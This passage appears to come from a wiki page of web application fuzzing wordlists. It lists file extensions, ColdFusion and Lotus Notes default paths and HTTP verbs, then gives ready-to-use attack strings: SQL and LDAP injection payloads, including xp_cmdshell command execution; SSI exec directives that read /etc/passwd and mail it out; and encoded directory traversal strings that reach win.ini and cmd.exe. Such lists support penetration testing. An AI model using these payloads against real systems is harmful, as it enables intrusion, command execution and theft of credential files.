.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
